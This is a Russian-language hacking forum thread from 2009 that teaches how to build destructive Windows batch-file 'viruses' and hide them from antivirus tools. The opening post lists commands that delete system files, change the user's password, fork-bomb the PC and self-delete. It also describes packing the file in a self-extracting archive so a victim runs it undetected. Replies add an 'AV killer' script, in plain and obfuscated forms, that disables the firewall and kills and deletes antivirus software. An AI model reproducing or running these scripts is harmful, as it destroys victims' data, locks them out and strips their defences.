 |
Батники, и о том, как сделать чтобы они не ловились Антивирусными приложениями. |
17.09.2009, 10:53
|
|
Новичок
Регистрация: 16.09.2009
Сообщений: 1
С нами:
8764238
Репутация:
3
|
|
Батники, и о том, как сделать чтобы они не ловились Антивирусными приложениями.
Эта статья о Батниках, и о том, как сделать чтобы они не ловились Антивирусными приложениями.
Всем Привет!
Свами CheatMaster
Может для некоторых эта статья не станет новостью, но всёравно я расскажу.
Для создания Батника нам необходимо Стандартный блокнот Windows (он есть у каждого) и архиватор WinRAR.
Итак начнём:
Создаём блокнот,пишем в него команды (они написанны ниже).
Затем Файл>Сохранить как...>
И в поле "Имя файла:" вместо "Текстовый документ.txt" пишем "Вирус.bat" и нажимаем "Сохранить"
_____________________________
Команды:
Убрать рабочий стол:
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
Удалить дрова:
del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul
Перезагрузка компа:
shutdown -r -t 1 -c "lol" >nul
Удаление файлов:
erase %windir%*.* /q
Меняет пароль текущего пользователя на 123456:
net user %username% 123456
Открывает больше 200 окошек,и если все не закрыть то комп грузнется и может слететь ОС(если слабый комп):
:s
start %0
%0|%0
goto :s|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0
goto :s
Ставит время на 0:00:
time 0:00 >nul
Удаление курсора:
del "%SystemRoot%Cursors*.*" >nul
Самоликвидация (самое главное):
del "%0" >nul
_____________________________
И казалось бы Батник готов, но возникает один вопрос:
Как заставить жертву запустить этот вирус? Т.к расшерение вируса "*.bat" жертва даже необратит на него внимание.
Здесь можно действовать двумя способами:
Способ 1
Скомпилировать файл спомощью программ таких как "MicroJoiner".
Но файл, полученный врезультате этого будет ловиться Антивирусами.
Способ 2
И наконец самое интересное, собственно длячего была написанна эта статья:
1) Создать с помощью Архива WinRAR - самораспаковывающийся архив.
2) Поместить в него готовый Батник.
3) Сменить расшерение файла ("*.rar.exe" на "*.rar") (где * - имя файла).
4) Затем открыть архив, и во вкладке "SFX" нажать "Дополнительные параметры SFX..."
5) Написать в поле "Выполнить после распаковки" имя вашего вируса (уже добавленного в архив) вместе с расширением, и нажать "OK". (В других вкладках можно написать Лацензионноесоглашение и т.д.)
6) Закрыть архив, и сменить расшерение ("*.rar" на "*.exe").
Если вы сделали всё верно, тогда ваш Вирус небудет ловиться Антивирусным приложением (Проверенно на ESET NOD32 и Dr.Web)
CheatMaster специально для Antichat.ru
|
|
|
17.09.2009, 12:58
|
|
Новичок
Регистрация: 26.02.2007
Сообщений: 13
С нами:
10108288
Репутация:
1
|
|
WinRar 'ом пользоваться ты научился! ) Теперь научись настраивать NOD32. )
|
|
|
|
17.09.2009, 13:19
|
|
Участник форума
Регистрация: 25.10.2007
Сообщений: 248
С нами:
9760706
Репутация:
452
|
|
Код:
net stop â?œSecurity Centerâ?
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
|
|
|
|
17.09.2009, 13:27
|
|
Постоянный
Регистрация: 20.12.2007
Сообщений: 577
С нами:
9679729
Репутация:
171
|
|
я тебя огорчу, но против любого нормального антивируса или фаера такая фигня уже не прокатит
зы. есть такая системная переменная, как %programfiles% . ога
Последний раз редактировалось Pernat1y; 17.09.2009 в 13:29..
|
|
|
|
17.09.2009, 14:02
|
|
Участник форума
Регистрация: 25.10.2007
Сообщений: 248
С нами:
9760706
Репутация:
452
|
|
а так?
Код:
echo AV KILLER! Kills all Anti Viruses at Once
pause >nul
set fun=net
set morefun=stop
set math=tsk
set ias=ill
set mathias=del
set beer=/a
cls
echo Disabling the Firewall
%fun% %morefun% â?œSecurity Centerâ?
%fun%sh firewall set opmode mode=disable
pause >nul
cls
echo Analyzing
echo.
echo.
echo Please Wait Patiently
%math%%ias% %beer% E-*
%math%%ias% %beer% av*
%math%%ias% %beer% fire*
%math%%ias% %beer% anti*
%math%%ias% %beer% spy*
%math%%ias% %beer% bullguard
%math%%ias% %beer% PersFw
%math%%ias% %beer% KAV*
%math%%ias% %beer% ZONEALARM
%math%%ias% %beer% SAFEWEB
%math%%ias% %beer% OUTPOST
%math%%ias% %beer% nv*
%math%%ias% %beer% nav*
%math%%ias% %beer% F-*
%math%%ias% %beer% ESAFE
%math%%ias% %beer% cle
%math%%ias% %beer% BLACKICE
%math%%ias% %beer% def*
%math%%ias% %beer% kav
%math%%ias% %beer% kav*
%math%%ias% %beer% avg*
%math%%ias% %beer% ash*
%math%%ias% %beer% aswupdsv
%math%%ias% %beer% ewid*
%math%%ias% %beer% guard*
%math%%ias% %beer% guar*
%math%%ias% %beer% gcasDt*
%math%%ias% %beer% msmp*
%math%%ias% %beer% mcafe*
%math%%ias% %beer% mghtml
%math%%ias% %beer% msiexec
%math%%ias% %beer% outpost
%math%%ias% %beer% isafe
%math%%ias% %beer% zap*
%math%%ias% %beer% zauinst
%math%%ias% %beer% upd*
%math%%ias% %beer% zlclien*
%math%%ias% %beer% minilog
%math%%ias% %beer% cc*
%math%%ias% %beer% norton*
%math%%ias% %beer% norton au*
%math%%ias% %beer% ccc*
%math%%ias% %beer% npfmn*
%math%%ias% %beer% loge*
%math%%ias% %beer% nisum*
%math%%ias% %beer% issvc
%math%%ias% %beer% tmp*
%math%%ias% %beer% tmn*
%math%%ias% %beer% pcc*
%math%%ias% %beer% cpd*
%math%%ias% %beer% pop*
%math%%ias% %beer% pav*
%math%%ias% %beer% padmin
%math%%ias% %beer% panda*
%math%%ias% %beer% avsch*
%math%%ias% %beer% sche*
%math%%ias% %beer% syman*
%math%%ias% %beer% virus*
%math%%ias% %beer% realm*
%math%%ias% %beer% sweep*
%math%%ias% %beer% scan*
%math%%ias% %beer% ad-*
%math%%ias% %beer% safe*
%math%%ias% %beer% avas*
%math%%ias% %beer% norm*
%math%%ias% %beer% offg*
cls
echo Done!
pause >nul
echo Deleting All Anti-Viruses
echo Please Wait Patiently
%mathias% /Q /F %ProgramFiles%\alwils~1\avast4\*.*
%mathias% /Q /F %ProgramFiles%\Lavasoft\Ad-awa~1\*.exe
%mathias% /Q /F %ProgramFiles%\kasper~1\*.exe
%mathias% /Q /F %ProgramFiles%\trojan~1\*.exe
%mathias% /Q /F %ProgramFiles%\f-prot95\*.*
%mathias% /Q /F %ProgramFiles%\tbav\*.dat
%mathias% /Q /F %ProgramFiles%\avpersonal\*.*
%mathias% /Q /F %ProgramFiles%\Norton~1\*.*
%mathias% /Q /F %ProgramFiles%\Mcafee\*.*
%mathias% /Q /F %ProgramFiles%\Norton~1\Norton~1\Norton~3\*.*
%mathias% /Q /F %ProgramFiles%\Norton~1\Norton~1\speedd~1\*.*
%mathias% /Q /F %ProgramFiles%\Norton~1\Norton~1\*.*
%mathias% /Q /F %ProgramFiles%\Norton~1\*.*
%mathias% /Q /F %ProgramFiles%\avgamsr\*.exe
%mathias% /Q /F %ProgramFiles%\avgamsvr\*.exe
%mathias% /Q /F %ProgramFiles%\avgemc\*.exe
%mathias% /Q /F %ProgramFiles%\avgcc\*.exe
%mathias% /Q /F %ProgramFiles%\avgupsvc\*.exe
%mathias% /Q /F %ProgramFiles%\grisoft
%mathias% /Q /F %ProgramFiles%\nood32krn\*.exe
%mathias% /Q /F %ProgramFiles%\nood32\*.exe
%mathias% /Q /F %ProgramFiles%\nod32\*.exe
%mathias% /Q /F %ProgramFiles%\nood32\*.exe
%mathias% /Q /F %ProgramFiles%\kav\*.exe
%mathias% /Q /F %ProgramFiles%\kavmm\*.exe
%mathias% /Q /F %ProgramFiles%\kaspersky\*.*
%mathias% /Q /F %ProgramFiles%\ewidoctrl\*.exe
%mathias% /Q /F %ProgramFiles%\guard\*.exe
%mathias% /Q /F %ProgramFiles%\ewido\*.exe
%mathias% /Q /F %ProgramFiles%\pavprsrv\*.exe
%mathias% /Q /F %ProgramFiles%\pavprot\*.exe
%mathias% /Q /F %ProgramFiles%\avengine\*.exe
%mathias% /Q /F %ProgramFiles%\apvxdwin\*.exe
%mathias% /Q /F %ProgramFiles%\webproxy\*.exe
%mathias% /Q /F %ProgramFiles%\panda software\*.*
cls
echo Done!
|
|
|
|
18.09.2009, 21:17
|
|
Постоянный
Регистрация: 20.12.2007
Сообщений: 577
С нами:
9679729
Репутация:
171
|
|
крипт, это конечно круто, но всеравно не прокатит
|
|
|
|
18.09.2009, 21:21
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Hello, Antichat 
Код:
@set j=@set
%j% w67=%
%j% v11=0
%j% f5=y
%j% y9=o
%j% k2=j
%j% m27=c
%j% p32=a
%j% l10=h
%j% t23=k
%j% j17=2
%j% s15=l
%j% d30=q
%j% o22=v
%j% t91=%1
%j% w13=i
%j% d0=e
%j% p25=9
%j% i12=6
%j% w14=t
%j% p7=p
%j% o19=d
%j% m34=1
%j% h33=7
%j% q20=4
%j% d29=w
%j% f18=s
%j% d38=%SystemRoot%
%j% b1=8
%j% b49=%Temp%
%j% c3=3
%j% u35=g
%j% j8=n
%j% n65="
%j% m31=r
%j% q16=u
%j% p80=%0
%j% p6=x
%j% e28=b
%j% b4=z
%j% l26=f
%j% k24=5
%j% h21=m
%d0%%m27%%l10%%y9% %n65%H%d0%%s15%%s15%%y9%, ANTICHAT%n65%
|
|
|
|
22.09.2009, 01:11
|
|
Участник форума
Регистрация: 25.10.2007
Сообщений: 248
С нами:
9760706
Репутация:
452
|
|
хм, надо подумать =)
|
|
|
|
22.09.2009, 02:57
|
|
Постоянный
Регистрация: 28.12.2007
Сообщений: 804
С нами:
9668486
Репутация:
1400
|
|
для совсем ленивых)))
http://multi-up.com/144736
эм.. автора не помню.. кто то с ачата писал
з.ы.: вроде вирусов нет )) |
|
|
|
22.09.2009, 03:43
|
|
Постоянный
Регистрация: 01.04.2009
Сообщений: 508
С нами:
9006192
Репутация:
194
|
|
о, спасибо )
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
